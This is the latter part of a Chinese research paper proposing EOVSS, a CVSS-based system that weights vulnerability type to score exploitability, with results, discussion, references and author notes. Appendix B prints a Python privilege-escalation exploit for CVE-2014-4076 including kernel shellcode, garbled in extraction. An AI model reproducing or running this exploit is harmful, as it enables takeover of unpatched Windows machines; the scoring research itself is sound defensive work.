在利用攻擊路徑的網(wǎng)絡(luò)安全態(tài)勢(shì)分析中，攻擊者能成功攻擊目標(biāo)是由每一條的攻擊路徑成功概率組成，而每一條攻擊路徑的成功概率是由該路徑上每一個(gè)漏洞節(jié)點(diǎn)被成功利用的概率相乘得到[26].表6中我們已經(jīng)利用3種評(píng)分標(biāo)準(zhǔn)得出了不同的漏洞被成功利用概率P，接下來(lái)我們將計(jì)算每一條攻擊路徑能成功攻擊的概率.為了對(duì)比實(shí)驗(yàn)數(shù)據(jù)準(zhǔn)確性，我們構(gòu)建了實(shí)驗(yàn)環(huán)境進(jìn)行大量模擬攻擊測(cè)試，通過(guò)模擬攻擊測(cè)試來(lái)得到實(shí)際概率，并利用實(shí)際概率來(lái)獲得實(shí)際情況下攻擊成功的概率Actual，與上述計(jì)算結(jié)果進(jìn)行對(duì)比，通過(guò)5條路徑來(lái)計(jì)算平均準(zhǔn)確率，得出評(píng)估系統(tǒng)的準(zhǔn)確性.計(jì)算結(jié)果及測(cè)試數(shù)據(jù)如表7所示.其中Accuracy是準(zhǔn)確率，S為標(biāo)準(zhǔn)差.

Table 6 The Probability of Vulnerability Exploitability and Being Used Probability

Table 7 Results and Comparison

如表7所示，WIVSS的準(zhǔn)確率雖然比CVSS高，但是文中只憑主觀判斷來(lái)確定漏洞可利用性要素，沒(méi)有實(shí)驗(yàn)數(shù)據(jù)，不具說(shuō)服力.EOVSS中，將漏洞類型作為可利用要素之一有數(shù)據(jù)依據(jù)，更具說(shuō)服力，實(shí)驗(yàn)結(jié)果也表明：EOVSS的準(zhǔn)確性高，標(biāo)準(zhǔn)差低，評(píng)分結(jié)果比較穩(wěn)定.

5.3EOVSS整體準(zhǔn)確率

5.2節(jié)通過(guò)基于攻擊圖實(shí)驗(yàn)說(shuō)明單個(gè)漏洞可利用性的評(píng)分狀況，證明在利用攻擊圖對(duì)網(wǎng)絡(luò)安全態(tài)勢(shì)分析研究中，EOVSS對(duì)單個(gè)漏洞可利用性的量化評(píng)估準(zhǔn)確率更高.由于5.2節(jié)是漏洞僅在特定環(huán)境下的部署，為了更具說(shuō)服性以及客觀性，采取文獻(xiàn)[27]方式，選取了分布各分值的2 000個(gè)漏洞作為樣本，對(duì)其進(jìn)行大量滲透測(cè)試，得出漏洞固有可利用概率并與CVSS,WIVSS,EOVSS進(jìn)行對(duì)比.結(jié)果如圖8所示.

由圖8可知，EOVSS與實(shí)際情況的擬合度比CVSS和WIVSS高，因此，基于CVSS基礎(chǔ)上，加入漏洞類型這一要素進(jìn)行漏洞可利用性評(píng)估結(jié)果更符合實(shí)際情況，EOVSS具有更好的準(zhǔn)確性.

Fig. 8 Three systems for scoring the exploitability of vulnerability distributions fitting圖8 3種漏洞可利用性評(píng)估系統(tǒng)擬合圖

6 分析與討論

第5節(jié)通過(guò)數(shù)據(jù)統(tǒng)計(jì)及實(shí)驗(yàn)分別從個(gè)例和整體分析了EOVSS的評(píng)估效果.為了更直觀地對(duì)比3種評(píng)估系統(tǒng)，本節(jié)將做進(jìn)一步說(shuō)明.表8為3種評(píng)估系統(tǒng)總結(jié)對(duì)比詳情.

Table 8 Details of Three Systems

現(xiàn)有階段對(duì)漏洞可利用性研究還不夠全面，但基于攻擊圖對(duì)網(wǎng)絡(luò)態(tài)勢(shì)進(jìn)行分析的研究是當(dāng)前的熱點(diǎn)，如何給基于攻擊圖分析網(wǎng)絡(luò)安全態(tài)勢(shì)提供客觀準(zhǔn)確的評(píng)估依據(jù)也成為現(xiàn)如今亟待解決的問(wèn)題之一.

本文僅從增加要素的角度去考慮，研究證明了漏洞類型是可以影響漏洞可利用性的.但在現(xiàn)實(shí)網(wǎng)絡(luò)情況中，漏洞隨著網(wǎng)絡(luò)環(huán)境、時(shí)間推移也會(huì)發(fā)生相應(yīng)的變化.影響漏洞可利用性要素不局限于漏洞類型，還可能受其他因素影響，不僅漏洞本身的屬性會(huì)影響漏洞可利用性，外界網(wǎng)絡(luò)環(huán)境也會(huì)影響可利用性，例如攻擊工具的完善程度、是否存在相應(yīng)的補(bǔ)丁、防火墻路由器設(shè)施完備性等.

基于上述分析，一方面對(duì)于漏洞本身屬性，如何準(zhǔn)確提取出影響要素以及客觀地進(jìn)行量化是漏洞可利用性研究的重點(diǎn).另一方面，對(duì)于環(huán)境變量因素，如何在不同的網(wǎng)絡(luò)環(huán)境中對(duì)漏洞可利用性進(jìn)行評(píng)估是研究的難點(diǎn).本文作者僅對(duì)漏洞類型這一要素進(jìn)行了研究，還存在著不足.下一步的研究工作主要有3個(gè)方面：

1) 對(duì)漏洞可利用性影響要素進(jìn)行進(jìn)一步的分析，能通過(guò)數(shù)據(jù)依據(jù)提取出相關(guān)影響要素，使結(jié)論具有一定的客觀依據(jù).

2) 利用更有效的數(shù)學(xué)方法對(duì)影響要素進(jìn)行量化，從而進(jìn)一步完善EOVSS.

3) 在不同的網(wǎng)絡(luò)環(huán)境下對(duì)EOVSS進(jìn)行檢測(cè)，并考慮環(huán)境變量因素，使EOVSS能更符合如今復(fù)雜的網(wǎng)絡(luò)環(huán)境.

7 總 結(jié)

本文首先對(duì)54331個(gè)漏洞的CVSS可利用性分值進(jìn)行分析，可知評(píng)分系統(tǒng)存在分值不夠多樣化等不足.為了優(yōu)化評(píng)分系統(tǒng)，對(duì)漏洞可利用性要素進(jìn)行分析，發(fā)現(xiàn)漏洞類型影響可利用性，因此，將其作為評(píng)分要素之一，通過(guò)AHP方法將漏洞類型進(jìn)行量化，在CVSS基礎(chǔ)上改進(jìn)成為新的評(píng)分標(biāo)準(zhǔn)EOVSS.實(shí)驗(yàn)證明，EOVSS具有良好的多樣性以及更高的準(zhǔn)確性，能為安全人員提供更好的服務(wù).

[1] Liu Qixu, Zhang Chongbing, Zhang Yuqing, et al. Research on key technology of vulnerability threat classification[J]. Journal on Communications, 2012, 33(Z1): 79-87 (in Chinese)

(劉奇旭, 張翀斌, 張玉清, 等. 安全漏洞等級(jí)劃分關(guān)鍵技術(shù)研究[J]. 通信學(xué)報(bào), 2012, 33(Z1): 79-87)

[2] Acemoglu D, Malekian A, Ozdaglar A. Network security and contagion[J]. Journal of Economic Theory, 2016, 42(3): 38-48

[3] Wang Lingyu, Singhal A, Jajodia S. Measuring the overall security of network configurations using attack graphs[C] // Proc of the 11th Ifip Wg 11.3 Working Conf on Data and Applications Security. Berlin: Springer, 2007: 98-112

[4] Younis A, Malaiya Y K, Ray I. Assessing vulnerability exploitability risk using software properties[J]. Software Quality Journal, 2016, 24(1): 159-202

[5] Szwed P, Skrzyński P. A new lightweight method for security risk assessment based on fuzzy cognitive maps[J]. International Journal of Applied Mathematics & Computer Science, 2014, 24(1): 213-225

[6] Dawkins J, Hale J. A systematic approach to multi-stage network attack analysis[C] //Proc of the 4th Int Information Assurance Workshop. Piscataway, NJ: IEEE, 2004: 48-56

[7] Lai Y P, Hsia P L. Using the vulnerability information of computer systems to improve the network security[J].Computer Communications, 2007, 30(9): 2032-2047

[8] Zhang Fengli, Feng Bo. Vulnerability assessment based on correlation[J]. Application Research of Computers, 2014, 31(3): 811-814

[9] Frigault M. Measuring network security using bayesian network-based attack graphs[J]. Computer Software and Applications, 2010, 22(4): 698-703

[10] Lu Yuliang, Xia Yang. Reaserch on target-computer secure quantitative fusion model[J]. Chinese Journal of Computers, 2005, 28(5): 914-920 (in Chinese)

(陸余良, 夏陽(yáng). 主機(jī)安全量化融合模型研究[J]. 計(jì)算機(jī)學(xué)報(bào), 2005, 28(5): 914-920)

[11] Wen Tao, Zhang Yuqing. ASVC: An automatic security vulnerability categorization framework based on novel features of vulnerability data[J].Journal of Communications, 2015, 76(8): 823-895

[12] Wen Tao, Zhang Yuqing, Dong Ying, et al. A novel automatic severity vulnerability assessment framework[J]. Journal of Communications, 2015, 10(5): 786-798

[13] Liu Qixu, Zhang Yuqing, Kong Ying, et al. Improving VRSS-based vulnerability prioritization using analytic hierarchy process [J]. Journal of Systems & Software, 2012, 85(8): 1699-1708

[14] Wang Ruyi, Gao Ling, Sun Qian, et al. An improved CVSS-based vulnerability scoring mechanism[C] //Proc of the 3rd Int Conf on Multimedia Information Networking and Security. Piscataway, NJ: IEEE, 2011: 352-355

[15] Zhang Yuqing, Fang Zhejun, Wang Kai, et al. Survey of Android vulnerability detection[J]. Journal of Computer Research and Development, 2015, 52(10): 2167-2177 (in Chinese)

(張玉清, 方喆君, 王凱, 等. Android安全漏洞挖掘技術(shù)綜述[J]. 計(jì)算機(jī)研究與發(fā)展, 2015, 52(10): 2167-2177)

[16] Liu Qixu, Zhang Yuqing. VRSS: A new system for rating and scoring vulnerabilities[J]. Computer Communications, 2011, 34(3): 264-273

[17] Spanos G, Sioziou A, Angelis L. WIVSS: A new methodology for scoring information systems vulnerabilities[J]. Computer Communications, 2013, 34(5): 83-90

[18] Mell P, Scarfone K, Romanosky S. Common vulnerability scoring system[J]. IEEE Security & Privacy Magazine, 2006, 4(6): 85-89

[19] Scarfone K, Mell P. An analysis of CVSS version 2 vulnerability scoring[C] // Proc of the 3rd Int Symp on Empirical Software Engineering and Measurement. Piscataway, NJ: IEEE, 2009: 516-525

[20] CANs. Common vulnerabilities and exposures[EB/OL]. [2017-04-14]. http: //cve.mitre.org/index.html

[21] CANs. Common weakness enumeration[EB/OL].[2017-01-18]. http: //cwe.mitre.org

[22] Rasheed A R, Abdulla A, Zakariyya N I. Vulnerability of different types of fishers to potential implementation of a management plan in a marine protected area (MPA) in the Maldives[J]. Marine Policy, 2016, 74(2): 195-204

[23] Montaigne D, Coisne A, Sosner P, et al. Electrical atrial vulnerability and renal complications in type 2 diabetes[J]. Diabetologia, 2015, 59(4): 1-12

[24] Aonso J A, Lamata M T. Consistency in the analytic hierarchyprocess: A new approach[J]. International Journal of Uncertainty, Fuzziness and Knowlege-Based Systems, 2006, 14(4): 445-459

[25] Keramati M, Akbari A, Keramati M. CVSS-based security metrics for quantitative analysis of attack graphs[C] //Proc of the 2013 IEEE Int conf Computer and Knowledge Engineering. Piscataway, NJ: IEEE, 2013: 178-183

[26] Jiang Hui. The detection of global vulnerability based on attack path[D].Qingdao: Ocean University of China, 2015 (in Chinese)

(姜慧. 基于攻擊路徑的全局漏洞檢測(cè)[D]. 青島: 中國(guó)海洋大學(xué), 2015)

[27] Miaoui Y, Boudriga N. Enterprise security investment through time when facing different types of vulnerabilities[J]. Information Systems Frontiers, 2017, 20(2): 11-24

ASystemforScoringtheExploitabilityofVulnerabilityBasedTypes

Lei Kenan1,2, Zhang Yuqing1,2, Wu Chensi2, and Ma Hua3

1(StateKeyLaboratoryofIntegratedServicesNetworks(XidianUniversity),Xi’an710071)2(NationalComputerNetworkIntrusionProtectionCenter(UniversityofChineseAcademyofSciences),Beijing101408)3(SchoolofMathematicsandStatistics,XidianUniversity,Xi’an710071)

As is known to all, vulnerabilities play an extremely important role in network security now. Accurately quantizing the exploitability of a vulnerability is critical to the attack-graph based analysis of network information system security. Currently the most widely used assessment system for vulnerability exploitability is the common vulnerability scoring system (CVSS). Firstly, the exploitability scores of 54331 vulnerabilities are computed by using CVSS. Then, statistical analysis is performed on the computed exploitability scores, which indicates that CVSS lacks diversity, and more diverse results can help end-users prioritize vulnerabilities and fix those that pose the greatest risks at first. Statistical results show that the scores are too centralized as well. Finally, taking into account the disadvantages of CVSS, we study the influence factors of vulnerability exploitability, and demonstrate that the types of a vulnerability can influence its exploitability. Therefore, we consider vulnerability types as one of the influence factors of vulnerability exploitability, and use analytic hierarchy process to quantify it, and propose a more comprehensive quantitative evaluation system named exploitability of vulnerability scoring systems (EOVSS) based on CVSS. Experiments show that the diversity of scores computed by EOVSS is four times that computed by CVSS, and EOVSS can more accurately and effectively quantify the exploitability of a vulnerability in comparison with CVSS.

vulnerability; exploitability; vulnerability type; analytic hierarchy process; quantification

TP393

LeiKenan, born in 1992. Master candidate in Xidian University. Her main research interests include network and information security.

ZhangYuqing, born in 1966. PhD. Professor in the University of Chinese Academy of Sciences. His main research interests include network and information system security.

WuChensi, born in 1990. Master candidate in the University of Chinese Academy of Sciences. His main research interests include network and information security (wucs@nipc.org.cn).

MaHua, born in 1963. Professor in Xidian University. Her main research interests include information security (ma_hua@126.com).

附錄A

Table A1 Distribution of CVSS Exploitability Scores

Table A2 Distribution of EOVSS Exploitability Scores

Continued (Table A2)

附錄B

部分攻擊代碼

#!/usr/bin/python2

from optparse import OptionParser

from subprocess import Popen

from os.path import exists

from struct import pack

from threading import Thread

from time import sleep

from ctypes import*

from sys import exit

CreateFileA,NtAllocateVirtualMemory,Write ProcessMemory=windll.kernel32.CreateFileA,windll.ntdll.NtAllocateVirtualMemory,windll.kernel32.WriteProcessMemory

DeviceIoControlFile,CloseHandle=windll.ntdll.ZwDeviceIoControlFile,windll.kernel32.CloseHandle

INVALID_HANDLE_VALUE,FILE_SHARE_READ,FILE_SHARE_WRITE,OPEN_EXISTING,NULL=1,2,1,3,0

def spawn_process(path):

process=Popen([path],shell=True)

pid=process.pid

return

def main():

print "CVE-2014-4076 x86 exploit,Level "

global pid,process

parser=OptionParser()

parser.add_option("--path",dest="path",help="path of process to start and elevate")

parser.add_option("--pid",dest="pid",help="pid of running process to elevate")

o,a=parser.parse_args()

if (o.path==None and o.pid==None)

print "[!] no path or pid set"

exit(1)

else

if (o.path!=None)

if (exists(o.path)!=True)

print "[!] path does not exist"

exit(1)

else

Thread(target=spawn_process,args=(o.path),name='attacker-cmd').start()

if (o.pid!=None)

try

pid=int(o.pid)

except:

print "[!] could not convert PID to an interger."

exit(1)

while True:

if ("pid" not in globals()):

sleep(1)

else

print "[+] caught attacker cmd at %s,elevating now" % (pid)

break

buf="x00x04x00x00x00x00x00x00x00x02x00x00x00x02x00x00x22x00x00x00x04x00x00x00x00x00x01x00x00x00x00x00"

sc="x60x64xA1x24x01x00x00x8Bx40x38x50xBBx04x00x00x00x8Bx80x98x00x00x00x2Dx98x00x00x00x39x98x94x00x00x00x75xEDx8BxB8xD8x00x00x00x83xE7xF8x58xBBx41x41x41x41x8Bx80x98x00x00x00x2Dx98x00x00x00x39x98x94x00x00x00x75xEDx89xB8xD8x00x00x00x61xBAx11x11x11x11xB9x22x22x22x22xB8x3Bx00x00x00x8ExE0x0Fx35x00"

sc=sc.replace("x41x41x41x41",pack('

sc=sc.replace("x11x11x11x11","x39xffxa2xba")

sc=sc.replace("x22x22x22x22","x00x00x00x00")

handle=CreateFileA("\\.\Tcp",FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None)

if (handle==-1):

print "[!] could not open handle into the Tcp device"

exit(1)

print "[+] allocating memory"

ret_one=NtAllocateVirtualMemory(-1,byref(c_int(0x1000)),0x0,byref(c_int(0x4000)),0x1000|0x2000,0x40)

if (ret_one!=0):

print "[!] could not allocate memory..."

exit(1)

print "[+] writing relevant memory..."

ret_two=WriteProcessMemory(-1,0x28,

"x87xffxffx38",4,byref(c_int(0)))

ret_three=WriteProcessMemory(-1,

0x38,"x00" * 2,2,byref(c_int(0)))

ret_four=WriteProcessMemory(-1,

0x1100,buf,len(buf),byref(c_int(0)))

ret_five=WriteProcessMemory(-1,

0x2b,"x00" * 2,2,byref(c_int(0)))

ret_six=WriteProcessMemory(-1,

0x2000,sc,len(sc),byref(c_int(0)))

print "[+] attack setup done,crane kick!"

DeviceIoControlFile(handle,NULL,NULL,NULL,byref(c_ulong(8)),0x00120028,0x1100,len(buf),0x0,0x0)

CloseHandle(handle)

exit(0)

if __name__=="__main__":

main()